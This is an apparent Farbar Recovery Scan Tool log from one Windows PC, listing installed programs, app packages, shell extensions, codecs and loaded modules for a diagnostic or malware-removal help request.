Adobe Photoshop 2022 (HKLM-x32\...\PHSP_23_4_1) (Version: 23.4.1.547 - Adobe Inc.)
Adobe Premiere Pro 2022 (HKLM-x32\...\PPRO_22_5) (Version: 22.5 - Adobe Inc.)
AMD Radeon Settings (HKLM\...\WUCCCApp) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.)
AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 19.10.16 - Advanced Micro Devices, Inc.)
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.14 - Michael Tippach)
Balanced (HKLM-x32\...\{0EA45DD4-A825-420C-AFED-C659EFE3B84F}) (Version: 4.00.0000 - Advanced Micro Devices, Inc.) Hidden
Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
Discord (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Discord) (Version: 0.0.309 - Discord Inc.)
Dolphin (HKLM-x32\...\Dolphin) (Version: 5.0 - Dolphin Team)
EA app (HKLM\...\{C2622085-ABD2-49E5-8AB9-D3D6A642C091}) (Version: 12.0.229.5212 - Electronic Arts) Hidden
EA app (HKLM-x32\...\{c5b4b74e-fcb0-4603-b92d-3d17c96a6d69}) (Version: 12.0.229.5212 - Electronic Arts)
Epic Games Launcher (HKLM-x32\...\{0EE6DDEF-E36B-45EB-9E03-5A266EC8A8F8}) (Version: 1.1.279.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{F9C5C994-F6B9-4D75-B3E7-AD01B84073E9}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Epic Online Services (HKLM-x32\...\{4B31654B-80C2-405C-91C9-49B14AEB0F42}) (Version: 2.0.32.0 - Epic Games, Inc.)
Fallout: New Vegas (HKLM-x32\...\Fallout: New Vegas_is1) (Version: - )
FL Studio 20 (HKLM-x32\...\FL Studio 20) (Version: - Image-Line)
FL Studio ASIO (HKLM-x32\...\FL Studio ASIO) (Version: - Image-Line)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 103.0.5060.114 - Google LLC)
Launcher Prerequisites (x64) (HKLM-x32\...\{43a03b9c-4770-409c-a999-587b60700b63}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
MEGAsync (HKLM-x32\...\MEGAsync) (Version: - Mega Limited)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 103.0.1264.62 - Microsoft Corporation)
Microsoft Edge WebView2 Runtime (HKLM-x32\...\Microsoft EdgeWebView) (Version: 103.0.1264.49 - Microsoft Corporation)
Microsoft GameInput (HKLM-x32\...\{A9CFD6A1-C0D3-7F37-C220-8B104867EF15}) (Version: 10.1.22621.1011 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\OneDriveSetup.exe) (Version: 22.131.0619.0001 - Microsoft Corporation)
Microsoft Update Health Tools (HKLM\...\{7B1FCD52-8F6B-4F12-A143-361EA39F5E7C}) (Version: 3.67.0.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030 (HKLM\...\{37B8F9C7-03FB-3253-8781-2517C99D7C00}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030 (HKLM\...\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 (HKLM-x32\...\{B175520C-86A2-35A7-8619-86DC379688B9}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 (HKLM-x32\...\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40664 (HKLM-x32\...\{042d26ef-3dbe-4c25-95d3-4c1b11b235a7}) (Version: 12.0.40664.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40664 (HKLM-x32\...\{9dff3540-fc85-4ed5-ac84-9e3c7fd8bece}) (Version: 12.0.40664.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.40664 (HKLM\...\{010792BA-551A-3AC0-A7EF-0FAB4156C382}) (Version: 12.0.40664 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.40664 (HKLM\...\{53CF6934-A98D-3D84-9146-FC4EDF3D5641}) (Version: 12.0.40664 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.40664 (HKLM-x32\...\{D401961D-3A20-3AC7-943B-6139D5BD490A}) (Version: 12.0.40664 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.40664 (HKLM-x32\...\{8122DAB1-ED4D-3676-BB0A-CA368196543E}) (Version: 12.0.40664 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.28.29334 (HKLM-x32\...\{b2d0f752-adc5-496e-8f70-8669de01f746}) (Version: 14.28.29334.0 - Microsoft Corporation)
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.30.30704 (HKLM-x32\...\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}) (Version: 14.30.30704.0 - Microsoft Corporation)
Microsoft Visual C++ 2019 X86 Additional Runtime - 14.28.29334 (HKLM-x32\...\{14C49FC8-3E9B-4F29-8526-26629B5CF30B}) (Version: 14.28.29334 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.28.29334 (HKLM-x32\...\{0D01A812-82A1-481F-8546-8E28E976F8DF}) (Version: 14.28.29334 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.30.30704 (HKLM\...\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}) (Version: 14.30.30704 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.30.30704 (HKLM\...\{662A0088-6FCD-45DD-9EA7-68674058AED5}) (Version: 14.30.30704 - Microsoft Corporation) Hidden
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Minecraft Launcher (HKLM-x32\...\{27B34E47-68AE-4802-822A-9F0C187AF84A}) (Version: 1.0.0.0 - Mojang)
Mozilla Firefox (x64 en-US) (HKLM\...\Mozilla Firefox 102.0.1 (x64 en-US)) (Version: 102.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 89.0.2 - Mozilla)
NVIDIA FrameView SDK 1.2.7521.31103277 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_FrameViewSdk) (Version: 1.2.7521.31103277 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.25.1.27 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.25.1.27 - NVIDIA Corporation)
NVIDIA Graphics Driver 512.59 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 512.59 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.39.3 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.39.3 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.21.0713 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.21.0713 - NVIDIA Corporation)
NVIDIA USBC Driver 1.46.831.832 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_USBC) (Version: 1.46.831.832 - NVIDIA Corporation)
OEM Application Profile (HKLM-x32\...\{84AD2AF7-10C8-0395-66F9-FFAEB4C5DBF1}) (Version: 1.00.0000 - Advanced Micro Devices, Inc.)
ONN. (HKLM-x32\...\ONN.) (Version: 1.0.0.5.05 - )
OpenAL (HKLM-x32\...\OpenAL) (Version: - )
Origin (HKLM-x32\...\Origin) (Version: 10.5.113.50894 - Electronic Arts, Inc.)
Overwatch (HKLM-x32\...\Overwatch) (Version: - Blizzard Entertainment)
PCSX2 - Playstation 2 Emulator (HKLM-x32\...\pcsx2) (Version: 1.6.0 - PCSX2 Team)
qBittorrent 4.4.2 (HKLM-x32\...\qBittorrent) (Version: 4.4.2 - The qBittorrent project)
r2modman 3.1.25 (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\ac231ef6-6414-5f8d-b36f-3b57705721dd) (Version: 3.1.25 - ebkr)
RestMinder version 1.0.0.1 (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\{F481E04A-B87F-46D3-8FC5-A3440DE071C9}_is1) (Version: 1.0.0.1 - RestMinder)
Riot Vanguard (HKLM\...\Riot Vanguard) (Version: - Riot Games, Inc.)
Roblox Player for Miggy (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\roblox-player) (Version: - Roblox Corporation)
Spotify (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Spotify) (Version: 1.1.89.862.g94554d24 - Spotify AB)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Streamlabs Desktop 1.6.4 (HKLM\...\029c4619-0385-5543-9426-46f9987161d9) (Version: 1.6.4 - General Workings, Inc.)
TeamViewer (HKLM-x32\...\TeamViewer) (Version: 15.8.3 - TeamViewer)
Ubisoft Connect (HKLM-x32\...\Uplay) (Version: 112.3 - Ubisoft)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{0BAA0A93-3AD3-4B19-9105-4C8C3FA92A83}) (Version: 2.67.0.0 - Microsoft Corporation) Hidden
Update for Windows 10 for x64-based Systems (KB4480730) (HKLM\...\{0746492E-47B6-4251-940C-44462DFD74BB}) (Version: 2.55.0.0 - Microsoft Corporation)
UpdateAssistant (HKLM\...\{F339C545-24DC-4870-AA32-6EB6B0500B95}) (Version: 1.24.0.0 - Microsoft Corporation) Hidden
UXP WebView Support (HKLM-x32\...\UXPW_1_1_0) (Version: 1.1.0 - Adobe Inc.)
VALORANT (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Riot Game valorant.live) (Version: - Riot Games, Inc)
Vortex (HKLM\...\57979c68-f490-55b8-8fed-8b017a5af2fe) (Version: 1.5.13 - Black Tree Gaming Ltd.)
Windows 10 Update Assistant (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.22925 - Microsoft Corporation)
Windows PC Health Check (HKLM\...\{77ACFAF7-E5AB-410D-BA14-BBEBF89422DE}) (Version: 3.1.2109.29003 - Microsoft Corporation)
Zoom (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\ZoomUMX) (Version: 5.10.4 (5035) - Zoom Video Communications, Inc.)
Packages:
=========
Adobe Notification Client -> C:\Program Files\WindowsApps\AdobeNotificationClient_3.0.1.1_x86__enpm4xejd91yc [2022-04-20] (Adobe Systems Incorporated)
BreeZip -> C:\Program Files\WindowsApps\3138AweZip.AweZip_1.4.15.0_x86__ffd303wmbhcjt [2022-07-13] (BreeZip)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2021-03-15] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2021-03-15] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.13.7040.0_x64__8wekyb3d8bbwe [2022-07-13] (Microsoft Studios) [MS Ad]
Minecraft Launcher -> C:\Program Files\WindowsApps\Microsoft.4297127D64EC6_1.1.17.0_x64__8wekyb3d8bbwe [2022-06-08] (Microsoft Studios)
NVIDIA Control Panel -> C:\Program Files\WindowsApps\NVIDIACorp.NVIDIAControlPanel_8.1.962.0_x64__56jybvy8sckqj [2022-04-26] (NVIDIA Corp.)
Photos Media Engine Add-on -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2022-01-07] (Microsoft Corporation)
Realtek Audio Control -> C:\Program Files\WindowsApps\RealtekSemiconductorCorp.RealtekAudioControl_1.2.175.0_x64__dt26b99r8h8gj [2020-07-31] (Realtek Semiconductor Corp)
Visage -> C:\Program Files\WindowsApps\SadSquareStudio.Visage_1.1.0.0_x64__855q6fdw1qbrg [2022-06-22] (SadSquare Studio)
WhatsApp Desktop -> C:\Program Files\WindowsApps\5319275A.WhatsAppDesktop_2.2222.12.0_x64__cv1g1gvanyjgm [2022-07-01] (WhatsApp Inc.)
Word Mobile -> C:\Program Files\WindowsApps\Microsoft.Office.Word_16001.14326.21062.0_x64__8wekyb3d8bbwe [2022-07-13] (Microsoft Corporation)
==================== Custom CLSID (Whitelisted): ==============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020421-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020422-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020423-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020425-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{0E270DAA-1BE6-48F2-AC49-317A81924068} -> [Creative Cloud Files] => C:\Users\Miggy\Creative Cloud Files [2020-08-04 16:40]
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{2F81B25E-7507-4844-BFF2-77D2CC24CED4}\localserver32 -> C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe (Adobe Inc. -> Adobe Inc.)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{9E121B07-D732-48C1-94D0-77C233EAE0F3} -> [MEGAsync] => C:\Users\Miggy\Documents\MEGAsync [2022-06-05 15:01]
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{d1b22d3d-8585-53a6-acb3-0e803c7e8d2a}\localserver32 -> "C:\Users\Miggy\AppData\Local\Microsoft\Teams\current\Teams.exe" --toast => No File
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Inc. -> Adobe Systems)
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-06-23] (Mega Limited -> )
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-06-23] (Mega Limited -> )
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-06-23] (Mega Limited -> )
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2022-06-29] (Adobe Inc. -> )
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2022-06-29] (Adobe Inc. -> )
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2022-06-29] (Adobe Inc. -> )
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2021-05-06] (Igor Pavlov) [File not signed]
ContextMenuHandlers1: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2022-06-29] (Adobe Inc. -> )
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-06-23] (Mega Limited -> )
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-06-23] (Mega Limited -> )
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-06-23] (Mega Limited -> )
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2021-05-06] (Igor Pavlov) [File not signed]
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-06-23] (Mega Limited -> )
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files\AMD\CNext\CNext\atiacm64.dll [2017-04-24] (Advanced Micro Devices, Inc.) [File not signed]
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_4d7400884d0d52e3\nvshext.dll [2022-04-21] (Nvidia Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2021-05-06] (Igor Pavlov) [File not signed]
ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2022-06-29] (Adobe Inc. -> )
==================== Codecs (Whitelisted) ====================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Drivers32: [vidc.VP60] => C:\WINDOWS\SysWOW64\vp6vfw.dll [447752 2014-09-16] (Electronic Arts -> On2.com)
HKLM\...\Drivers32: [vidc.VP61] => C:\WINDOWS\SysWOW64\vp6vfw.dll [447752 2014-09-16] (Electronic Arts -> On2.com)
==================== Shortcuts & WMI ========================
==================== Loaded Modules (Whitelisted) =============
2021-10-18 17:33 - 2021-09-06 12:55 - 000033792 _____ () [File not signed] [File is in use] C:\Users\Miggy\AppData\Local\Programs\RestMinder\Gh.Common.dll
2022-07-12 17:36 - 2021-11-11 04:03 - 001495552 _____ () [File not signed] C:\Program Files (x86)\ONN\DuiLib.dll
2022-07-12 17:36 - 2018-09-06 03:45 - 000045056 _____ () [File not signed] C:\Program Files (x86)\ONN\HookDLL.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000015360 _____ () [File not signed] C:\Program Files (x86)\Origin\libEGL.DLL
2022-07-05 18:54 - 2022-07-05 18:54 - 003090944 _____ () [File not signed] C:\Program Files (x86)\Origin\libGLESv2.dll
2020-12-26 15:42 - 2022-03-03 19:23 - 126965248 _____ () [File not signed] C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\libcef.dll
2020-12-26 15:42 - 2021-11-17 04:38 - 000384000 _____ () [File not signed] C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\libegl.dll
2020-12-26 15:42 - 2021-11-17 04:38 - 008006656 _____ () [File not signed] C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\libglesv2.dll
2021-10-18 17:33 - 2021-09-06 10:18 - 012201136 _____ () [File not signed] C:\Users\Miggy\AppData\Local\Programs\RestMinder\sdk.dll
2022-07-12 17:36 - 2019-07-18 06:35 - 000049152 _____ (0) [File not signed] C:\Program Files (x86)\ONN\CommFunc.dll
2022-07-12 17:36 - 2019-08-17 03:25 - 000119296 _____ (0) [File not signed] C:\Program Files (x86)\ONN\DrvInDll.dll
2021-10-18 17:33 - 2021-06-16 14:44 - 000117248 _____ (Countly) [File not signed] [File is in use] C:\Users\Miggy\AppData\Local\Programs\RestMinder\Countly.dll
2021-10-18 17:33 - 2018-01-10 14:34 - 000024064 _____ (Daniel Grunwald, Omer Mor, Alex Davies, jnm2) [File not signed] [File is in use] C:\Users\Miggy\AppData\Local\Programs\RestMinder\AsyncBridge.Net35.dll
2021-06-27 21:31 - 2021-05-06 00:00 - 000077824 _____ (Igor Pavlov) [File not signed] C:\Program Files\7-Zip\7-zip.dll
2021-10-18 17:33 - 2018-03-24 18:44 - 000475136 _____ (Newtonsoft) [File not signed] [File is in use] C:\Users\Miggy\AppData\Local\Programs\RestMinder\Newtonsoft.Json.dll
2021-10-18 17:33 - 2018-05-11 09:52 - 000074240 _____ (Sentry) [File not signed] [File is in use] C:\Users\Miggy\AppData\Local\Programs\RestMinder\SharpRaven.dll
2020-12-26 15:42 - 2022-03-03 19:23 - 000983552 _____ (The Chromium Authors) [File not signed] C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\chrome_elf.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000002560 _____ (The ICU Project) [File not signed] C:\Program Files (x86)\Origin\icudt58.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 001252864 _____ (The ICU Project) [File not signed] C:\Program Files (x86)\Origin\icuuc58.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 001282048 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files (x86)\Origin\LIBEAY32.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000279040 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files (x86)\Origin\ssleay32.dll
2022-07-14 23:10 - 2022-07-14 23:10 - 002815488 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\libcrypto-1_1-x64.dll
2022-07-14 23:10 - 2022-07-14 23:10 - 000678400 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\libssl-1_1-x64.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000030208 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\imageformats\qgif.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000032768 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\imageformats\qico.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000256512 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\imageformats\qjpeg.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000026112 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\imageformats\qtga.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000305152 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\imageformats\qtiff.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000025600 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\imageformats\qwbmp.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 001611264 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\platforms\qwindows.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 005487104 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Core.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 005841920 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Gui.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000709120 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Multimedia.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 001179136 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Network.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000207360 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Positioning.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000310272 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5PrintSupport.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 003513344 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Qml.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 003390976 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Quick.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000068096 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5QuickWidgets.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000045568 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5TextToSpeech.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000116224 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5WebChannel.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 054071296 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5WebEngineCore.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000211456 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5WebEngineWidgets.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000146432 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5WebSockets.dll
